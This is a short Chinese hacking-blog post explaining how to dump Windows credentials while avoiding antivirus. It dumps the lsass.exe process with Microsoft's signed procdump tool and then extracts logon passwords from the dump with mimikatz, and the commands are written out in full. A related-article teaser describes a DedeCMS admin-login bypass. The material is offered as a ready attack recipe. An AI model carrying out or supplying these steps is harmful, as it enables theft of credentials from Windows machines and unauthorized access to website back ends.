绕过杀毒软件抓取windows密码

hacker5年前黑客文章853

 使用procdump,由于是微软的东西,带微软签名杀软不会报毒。

procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。


mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords

具体可以参考原文:

http://blog.gentilkiwi.com/securite/mimikatz/minidump


标签: 黑客技术

相关文章

什么是免疫程序调试?免疫系统疾病CANVASpentes

什么是免疫程序调试?免疫系统疾病CANVASpentes

immunity debugger 翻译中文也可了解为“免疫力程序调试”;   什么是免疫程序调试? 免疫系统疾病CANVAS pentesting专用工具能够用于检测你的系统软件真的是多...

Honeyd是不是适用全部电脑操作系统?

Honeyd是不是适用全部电脑操作系统?

什么叫Honeyd? Honeyd由Niels Provos建立,是一个开源代码,使客户可以在各种各样计算机网上建立和运作云虚拟主机。客户能够 配备这种云虚拟主机来仿真模拟不一样种类的网络服务器,使...

织梦网dedecms 0day

把以下代码中的:validate=dcug 改为当前的验证码,即可直接进入网站后台,此漏洞的前提是必须得到后台路径才能实现。 http://www.123.com/织梦网站后台/login....

Helix3Pro是不是完全免费?

Helix3Pro是不是完全免费?

什么叫Helix3 Pro? 如同之前的专用工具一样,Helix3 Pro是为计算机取证订制的与众不同专用工具。它早已十分细心地建立,以防止以一切方法触碰服务器,而且它是法医鉴定的。好的是Helix...

3389远程链接提示:你已经被拒绝登录到终端服务器[解决方案]

3389远程链接提示:你已经被拒绝登录到终端服务器[解决方案]

这是3389远程桌面的连接界面,当我们连接到服务器准备数据密码登录的时候,提示:你已经被拒绝登录到终端服务器。 【解决方案】: 本地登录服务器,进入...

Medusa是不是适用全部电脑操作系统?

Medusa是不是适用全部电脑操作系统?

什么叫Medusa? Medusa为一个规模性平行面,模块化设计,迅速和登陆的野蛮人。目地是适用很多容许远程控制认证的服务项目。该专用工具的关键作用包含根据进程的并行处理检测 - 能够 对好几个服务...